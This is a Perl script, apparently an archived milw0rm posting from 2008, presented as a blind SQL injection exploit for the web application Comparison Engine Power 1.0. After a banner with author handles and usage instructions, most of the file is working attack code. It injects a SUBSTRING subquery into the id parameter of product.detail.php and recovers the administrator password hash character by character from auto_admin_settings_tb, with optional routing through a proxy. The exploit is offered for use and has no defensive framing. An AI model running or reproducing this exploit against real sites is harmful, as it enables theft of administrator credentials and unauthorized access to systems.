Comparison Engine Power 1.0 Blind SQL Injection Exploit

#!/usr/bin/perl use&#160;LWP::UserAgent; use&#160;Getopt::Long; if(!$ARGV[1]) { &#160;&#160;print&#160;\"&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;\\n\"; &#160;&#160;print&#160;\"&#160;&#160;&#160;##################&#160;VIVA&#160;ISLAME&#160;VIVA&#160;ISLAME&#160;####################\\n\"; &#160;&#160;print&#160;\"&#160;&#160;&#160;##################&#160;VIVA&#160;ISLAME&#160;VIVA&#160;ISLAME&#160;####################\\n\"; &#160;&#160;print&#160;\"&#160;&#160;&#160;##&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;##\\n\"; &#160;&#160;print&#160;\"&#160;&#160;&#160;##&#160;&#160;&#160;Comparison&#160;Engine&#160;Power&#160;1.0&#160;Blind&#160;SQL&#160;Injection&#160;Exploit&#160;##\\n\"; &#160;&#160;print&#160;\"&#160;&#160;&#160;##&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;##\\n\"; &#160;&#160;print&#160;\"&#160;&#160;&#160;##&#160;&#160;&#160;Author:&#160;Mr.SQL&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;##\\n\"; &#160;&#160;print&#160;\"&#160;&#160;&#160;##&#160;&#160;&#160;EMAIL&#160;:&#160;SQL(at)HOTMAIL.IT&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;##\\n\"; &#160;&#160;print&#160;\"&#160;&#160;&#160;##&#160;&#160;&#160;HOME&#160;&#160;:&#160;WwW.PaL-HaCkEr.CoM&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;##\\n\"; &#160;&#160;print&#160;\"&#160;&#160;&#160;##&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;##\\n\"; &#160;&#160;print&#160;\"&#160;&#160;&#160;##&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;-((::&#160;GrE3E3E3E3E3ETZz&#160;::))-&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;##\\n\"; &#160;&#160;print&#160;\"&#160;&#160;&#160;##&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;##\\n\"; &#160;&#160;print&#160;\"&#160;&#160;&#160;##&#160;-&#160;HaCkEr_EGy&#160;-&#160;His0k4&#160;-&#160;Dark&#160;MaSTer&#160;-&#160;MoHaMaD&#160;AL&#160;3rab&#160;-&#160;&#160;&#160;##\\n\"; &#160;&#160;print&#160;\"&#160;&#160;&#160;##&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;-&#160;ALwHeD&#160;-&#160;&#160;HeBarIeH&#160;&#160;&#160;-&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;##\\n\"; &#160;&#160;print&#160;\"&#160;&#160;&#160;##&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;##\\n\"; &#160;&#160;print&#160;\"&#160;&#160;&#160;##&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;<<>>&#160;&#160;&#160;MuSliMs&#160;HaCkErS&#160;&#160;&#160;<<>>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;##\\n\"; &#160;&#160;print&#160;\"&#160;&#160;&#160;##&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;##\\n\"; &#160;&#160;print&#160;\"&#160;&#160;&#160;##&#160;&#160;&#160;Usage&#160;&#160;:&#160;perl&#160;exploit.pl&#160;host&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;##\\n\"; &#160;&#160;print&#160;\"&#160;&#160;&#160;##&#160;&#160;&#160;Example:&#160;perl&#160;exploit.pl&#160;www.host.com&#160;/&#160;-d&#160;10&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;##\\n\"; &#160;&#160;print&#160;\"&#160;&#160;&#160;##&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;##\\n\"; &#160;&#160;print&#160;\"&#160;&#160;&#160;##&#160;&#160;&#160;Options:&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;##\\n\"; &#160;&#160;print&#160;\"&#160;&#160;&#160;##&#160;&#160;&#160;&#160;&#160;-d&#160;&#160;&#160;&#160;valid&#160;id&#160;&#160;value&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;##\\n\"; &#160;&#160;print&#160;\"&#160;&#160;&#160;##&#160;&#160;&#160;Note:&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;##\\n\"; &#160;&#160;print&#160;\"&#160;&#160;&#160;##&#160;&#160;&#160;Don\'t&#160;forget&#160;to&#160;change&#160;the&#160;match&#160;if&#160;you&#160;have&#160;to&#160;do&#160;it&#160;&#160;&#160;##\\n\"; &#160;&#160;print&#160;\"&#160;&#160;&#160;##&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;##\\n\"; &#160;&#160;print&#160;\"&#160;&#160;&#160;###############################################################\\n\"; &#160;&#160;print&#160;\"&#160;&#160;&#160;###############################################################\\n\"; &#160;&#160;exit; } my&#160;$host&#160;&#160;&#160;=&#160;$ARGV[0]; my&#160;$path&#160;&#160;&#160;=&#160;$ARGV[1]; my&#160;$userid&#160;=&#160;1; my&#160;$id&#160;&#160;&#160;&#160;&#160;=&#160;$ARGV[2]; my&#160;%options&#160;=&#160;(); GetOptions(\\%options,&#160;\"u=i\",&#160;\"p=s\",&#160;\"d=i\"); print&#160;\"[~]&#160;Exploiting...\\n\"; if($options{\"u\"}) { &#160;&#160;$userid&#160;=&#160;$options{\"u\"}; } if($options{\"d\"}) { &#160;&#160;$id&#160;=&#160;$options{\"d\"}; } syswrite(STDOUT,&#160;\"[~]&#160;MD5-Hash:&#160;\",&#160;14); for(my&#160;$i&#160;=&#160;1;&#160;$i&#160;<=&#160;32;&#160;$i++) { &#160;&#160;my&#160;$f&#160;=&#160;0; &#160;&#160;my&#160;$h&#160;=&#160;48; &#160;&#160;while(!$f&#160;&&&#160;$h&#160;<=&#160;57) &#160;&#160;{ &#160;&#160;&#160;&#160;if(istrue2($host,&#160;$path,&#160;$userid,&#160;$id,&#160;$i,&#160;$h)) &#160;&#160;&#160;&#160;{ &#160;&#160;&#160;&#160;&#160;&#160;$f&#160;=&#160;1; &#160;&#160;&#160;&#160;&#160;&#160;syswrite(STDOUT,&#160;chr($h),&#160;1); &#160;&#160;&#160;&#160;} &#160;&#160;&#160;&#160;$h++; &#160;&#160;} &#160;&#160;if(!$f) &#160;&#160;{ &#160;&#160;&#160;&#160;$h&#160;=&#160;97; &#160;&#160;&#160;&#160;while(!$f&#160;&&&#160;$h&#160;<=&#160;122) &#160;&#160;&#160;&#160;{ &#160;&#160;&#160;&#160;&#160;&#160;if(istrue2($host,&#160;$path,&#160;$userid,&#160;$id,&#160;$i,&#160;$h)) &#160;&#160;&#160;&#160;&#160;&#160;{ &#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;$f&#160;=&#160;1; &#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;syswrite(STDOUT,&#160;chr($h),&#160;1); &#160;&#160;&#160;&#160;&#160;&#160;} &#160;&#160;&#160;&#160;&#160;&#160;$h++; &#160;&#160;&#160;&#160;} &#160;&#160;} } print&#160;\"\\n[~]&#160;Exploiting&#160;done\\n\"; sub&#160;istrue2 { &#160;&#160;my&#160;$host&#160;&#160;=&#160;shift; &#160;&#160;my&#160;$path&#160;&#160;=&#160;shift; &#160;&#160;my&#160;$uid&#160;&#160;&#160;=&#160;shift; &#160;&#160;my&#160;$id&#160;&#160;&#160;&#160;=&#160;shift; &#160;&#160;my&#160;$i&#160;&#160;&#160;&#160;&#160;=&#160;shift; &#160;&#160;my&#160;$h&#160;&#160;&#160;&#160;&#160;=&#160;shift; &#160; &#160;&#160;my&#160;$ua&#160;=&#160;LWP::UserAgent->new; &#160;&#160;my&#160;$query&#160;=&#160;\"http://\".$host.$path.\"product.detail.php?id=\".$id.\"&#160;and&#160;(SUBSTRING((SELECT&#160;password&#160;FROM&#160;auto_admin_settings_tb&#160;LIMIT&#160;0,1),\".$i.\",1))=CHAR(\".$h.\")\"; &#160; &#160;&#160;if($options{\"p\"}) &#160;&#160;{ &#160;&#160;&#160;&#160;$ua->proxy(\'http\',&#160;\"http://\".$options{\"p\"}); &#160;&#160;} &#160; &#160;&#160;my&#160;$resp&#160;&#160;&#160;&#160;=&#160;$ua->get($query); &#160;&#160;my&#160;$content&#160;=&#160;$resp->content; &#160;&#160;my&#160;$regexp&#160;&#160;=&#160;\"tourterms.pdf\"; &#160; &#160;&#160;if($content&#160;=~&#160;/$regexp/) &#160;&#160;{ &#160;&#160;&#160;&#160;return&#160;1; &#160;&#160;} &#160;&#160;else &#160;&#160;{ &#160;&#160;&#160;&#160;return&#160;0; &#160;&#160;} } #&#160;milw0rm.com&#160;[2008-06-17]